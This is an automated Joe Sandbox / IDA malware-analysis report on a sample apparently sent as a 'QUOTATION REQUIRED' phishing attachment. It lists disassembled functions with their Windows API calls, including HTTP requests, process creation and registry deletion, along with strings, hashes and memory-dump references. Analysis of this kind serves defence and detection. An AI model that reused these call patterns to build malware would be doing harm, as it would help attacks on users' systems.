                                                                                                                    • InitializeConditionVariable, xrefs: 00F30148
                                                                                                                    • kernel32.dll, xrefs: 00F30133
                                                                                                                    • SleepConditionVariableCS, xrefs: 00F30154
                                                                                                                    • WakeAllConditionVariable, xrefs: 00F30162
                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F30122
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                    • API String ID: 66158676-1714406822
                                                                                                                    • Opcode ID: ae90f1dbe776af6883f1f108ab9a3d7df12ea1c0f20e30d5e773e7f8ba3d4ba6
                                                                                                                    • Instruction ID: 52d297bbcfc3a45edbc9409646a9248e23c14a734bbb128772a2b026c6a016a9
                                                                                                                    • Opcode Fuzzy Hash: ae90f1dbe776af6883f1f108ab9a3d7df12ea1c0f20e30d5e773e7f8ba3d4ba6
                                                                                                                    • Instruction Fuzzy Hash: 3E21F6B2E447156BE7216BA4AC55B2A73A4EB46B71F00013BF801E7291DFB4DC00BAD1
                                                                                                                    Function 00F730F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                    • API String ID: 176396367-1603158881
                                                                                                                    • Opcode ID: b21d95e34a31bcc4ac6d6ee5dcad85b1c4ccc182cf416518255d1fdc9a56b0b3
                                                                                                                    • Instruction ID: 805c08a03f3614ec3999555234189a68951168868ab0fef1cfa4a768a1df9a57
                                                                                                                    • Opcode Fuzzy Hash: b21d95e34a31bcc4ac6d6ee5dcad85b1c4ccc182cf416518255d1fdc9a56b0b3
                                                                                                                    • Instruction Fuzzy Hash: F7E1B332E00516BACB18DF74C8517EEBBB1BF54720F58C12BE45AA7241DB30AE85B791
                                                                                                                    Function 00F844C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,00FACC08), ref: 00F84527
                                                                                                                    • _wcslen.LIBCMT ref: 00F8453B
                                                                                                                    • _wcslen.LIBCMT ref: 00F84599
                                                                                                                    • _wcslen.LIBCMT ref: 00F845F4
                                                                                                                    • _wcslen.LIBCMT ref: 00F8463F
                                                                                                                    • _wcslen.LIBCMT ref: 00F846A7
                                                                                                                      • Part of subcall function 00F2F9F2: _wcslen.LIBCMT ref: 00F2F9FD
                                                                                                                    • GetDriveTypeW.KERNEL32(?,00FD6BF0,00000061), ref: 00F84743
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                                    • Opcode ID: ed30b2552c43f19f32459d973aacd4a13efb9c9115208520646836237e915a58
                                                                                                                    • Instruction ID: 404036e4343d82e98cf17e28d52183cef4561ba7425fa03278aa2460e64913c9
                                                                                                                    • Opcode Fuzzy Hash: ed30b2552c43f19f32459d973aacd4a13efb9c9115208520646836237e915a58
                                                                                                                    • Instruction Fuzzy Hash: D4B1C371A083029FC710EF28C890AAEF7E5AFA5770F54491DF496C7291E734E944EB92
                                                                                                                    Function 00F9AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00F9B198
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F9B1B0
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F9B1D4
                                                                                                                    • _wcslen.LIBCMT ref: 00F9B200
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F9B214
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F9B236
                                                                                                                    • _wcslen.LIBCMT ref: 00F9B332
                                                                                                                      • Part of subcall function 00F805A7: GetStdHandle.KERNEL32(000000F6), ref: 00F805C6
                                                                                                                    • _wcslen.LIBCMT ref: 00F9B34B
                                                                                                                    • _wcslen.LIBCMT ref: 00F9B366
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F9B3B6
                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00F9B407
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F9B439
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F9B44A
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F9B45C
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F9B46E
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F9B4E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2178637699-0
                                                                                                                    • Opcode ID: 772ad936abd09928cb77eb0f4d4a88fb0fd2c95b43809cc4d28d628651b305a4
                                                                                                                    • Instruction ID: 7b9c1318610bbe6d2a85cbebd2839c188a008bde75c972f9ebb69c1645e8a32f
                                                                                                                    • Opcode Fuzzy Hash: 772ad936abd09928cb77eb0f4d4a88fb0fd2c95b43809cc4d28d628651b305a4
                                                                                                                    • Instruction Fuzzy Hash: EDF1B131A04300DFDB15EF24D991B6EBBE1AF85320F18855DF4998B2A2DB35EC44EB52
                                                                                                                    Function 00F1326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenuItemCount.USER32(00FE1990), ref: 00F52F8D
                                                                                                                    • GetMenuItemCount.USER32(00FE1990), ref: 00F5303D
                                                                                                                    • GetCursorPos.USER32(?), ref: 00F53081
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F5308A
                                                                                                                    • TrackPopupMenuEx.USER32(00FE1990,00000000,?,00000000,00000000,00000000), ref: 00F5309D
                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F530A9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 36266755-4108050209
                                                                                                                    • Opcode ID: 4e16844a7c178e18ad67374c82a73d79cd16bbc6bb94fbb213d6abdb41532b79
                                                                                                                    • Instruction ID: 81eeddc469333f45d36843a05757f8f2fe0c603af70c3f80c141d5ccb96b254d
                                                                                                                    • Opcode Fuzzy Hash: 4e16844a7c178e18ad67374c82a73d79cd16bbc6bb94fbb213d6abdb41532b79
                                                                                                                    • Instruction Fuzzy Hash: 8C713A71A44245BFEB219F24DC49F9ABFA4FF02374F204206FA156A1E0C7B1A954F791
                                                                                                                    Function 00FA6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00FA6DEB
                                                                                                                      • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FA6E5F
                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FA6E81
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FA6E94
                                                                                                                    • DestroyWindow.USER32(?), ref: 00FA6EB5
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F10000,00000000), ref: 00FA6EE4
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FA6EFD
                                                                                                                    • GetDesktopWindow.USER32 ref: 00FA6F16
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FA6F1D
                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FA6F35
                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FA6F4D
                                                                                                                      • Part of subcall function 00F29944: GetWindowLongW.USER32(?,000000EB), ref: 00F29952
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                    • API String ID: 2429346358-3619404913
                                                                                                                    • Opcode ID: 385985307de1dcf7814dd6551aa6130b74d4f894b79ac90a73e7fd2f8c8565fb
                                                                                                                    • Instruction ID: 6f7d4fb1a0114a399359fa86b3ce862b3c98c5ad4f011fd587bf94efaeb56c3b
                                                                                                                    • Opcode Fuzzy Hash: 385985307de1dcf7814dd6551aa6130b74d4f894b79ac90a73e7fd2f8c8565fb
                                                                                                                    • Instruction Fuzzy Hash: D47179B4544244AFDB21CF18DC84FAABBE9FB8A314F08041EF999C72A1D770E905EB55
                                                                                                                    Function 00FA911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00FA9147
                                                                                                                      • Part of subcall function 00FA7674: ClientToScreen.USER32(?,?), ref: 00FA769A
                                                                                                                      • Part of subcall function 00FA7674: GetWindowRect.USER32(?,?), ref: 00FA7710
                                                                                                                      • Part of subcall function 00FA7674: PtInRect.USER32(?,?,00FA8B89), ref: 00FA7720
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00FA91B0
                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FA91BB
                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FA91DE
                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FA9225
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00FA923E
                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00FA9255
                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00FA9277
                                                                                                                    • DragFinish.SHELL32(?), ref: 00FA927E
                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00FA9371
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                    • API String ID: 221274066-3440237614
                                                                                                                    • Opcode ID: e329dae97d0e16fe4afb1b220a01da4d587bcf2b6b089b1185e4fc1c8c0c4835
                                                                                                                    • Instruction ID: 1a70944e28b011f1fca421284fadfb50a4d10318ecaf0dca1fa82740ffb4d68c
                                                                                                                    • Opcode Fuzzy Hash: e329dae97d0e16fe4afb1b220a01da4d587bcf2b6b089b1185e4fc1c8c0c4835
                                                                                                                    • Instruction Fuzzy Hash: E7618CB1108305AFD701DF61DC85DAFBBE8EF89350F40092EF595932A1DB709A49EB92
                                                                                                                    Function 00F8C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F8C4B0
                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F8C4C3
                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F8C4D7
                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F8C4F0
                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00F8C533
                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F8C549
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F8C554
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F8C584
                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F8C5DC
                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F8C5F0
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00F8C5FB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                                    • Opcode ID: aeee401ef33e8ee53f15c09bde4b998086b4d68e82897db1d934c44bf284eb1c
                                                                                                                    • Instruction ID: bcc23adbcd20926d470808f06b6f1afd02702e98ea715769a6be0f6594e25456
                                                                                                                    • Opcode Fuzzy Hash: aeee401ef33e8ee53f15c09bde4b998086b4d68e82897db1d934c44bf284eb1c
                                                                                                                    • Instruction Fuzzy Hash: FF513BB1500609BFDB21AF64CD88AAB7BFCFF09754F04442AF9459A650DB34E944ABF0
                                                                                                                    Function 00FA856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00FA8592
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FA85A2
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FA85AD
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FA85BA
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00FA85C8
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FA85D7
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00FA85E0
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FA85E7
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FA85F8
                                                                                                                    • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00FAFC38,?), ref: 00FA8611
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00FA8621
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00FA8641
                                                                                                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00FA8671
                                                                                                                    • DeleteObject.GDI32(?), ref: 00FA8699
                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FA86AF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3840717409-0
                                                                                                                    • Opcode ID: 710bf5596f95c80a35f809ee23af0078d98b6bfaf0666e47b141bc7ccaf27f45
                                                                                                                    • Instruction ID: 4c809e1f8b512b85dd920138534b330748d67773749694eac6e11125a1b57655
                                                                                                                    • Opcode Fuzzy Hash: 710bf5596f95c80a35f809ee23af0078d98b6bfaf0666e47b141bc7ccaf27f45
                                                                                                                    • Instruction Fuzzy Hash: 9A41EBB5A00208AFDB11DFA5DC48EAA7BB8FF8A765F144158F905E7260DB709D01EB60
                                                                                                                    Function 00F814BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 00F81502
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00F8150B
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F81517
                                                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F815FB
                                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 00F81657
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00F81708
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00F8178C
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F817D8
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F817E7
                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 00F81823
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                    • API String ID: 1234038744-3931177956
                                                                                                                    • Opcode ID: d7e55b6c5490dbfbb6c29e02a98db9b04e69b73bbecc6ac3619476f305072768
                                                                                                                    • Instruction ID: 9558716078b4b187d2938dde49a0e726e681bb3f0f7aff386e9dc3ed60b2db6f
                                                                                                                    • Opcode Fuzzy Hash: d7e55b6c5490dbfbb6c29e02a98db9b04e69b73bbecc6ac3619476f305072768
                                                                                                                    • Instruction Fuzzy Hash: 55D11472A00115DBCB10AF65E885BFDB7B9BF46700F18825AE846AF180DB34DC46FB91
                                                                                                                    Function 00F9B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F9C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9B6AE,?,?), ref: 00F9C9B5
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9C9F1
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9CA68
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9CA9E
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9B6F4
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9B772
                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 00F9B80A
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00F9B87E
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00F9B89C
                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00F9B8F2
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F9B904
                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F9B922
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00F9B983
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F9B994
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
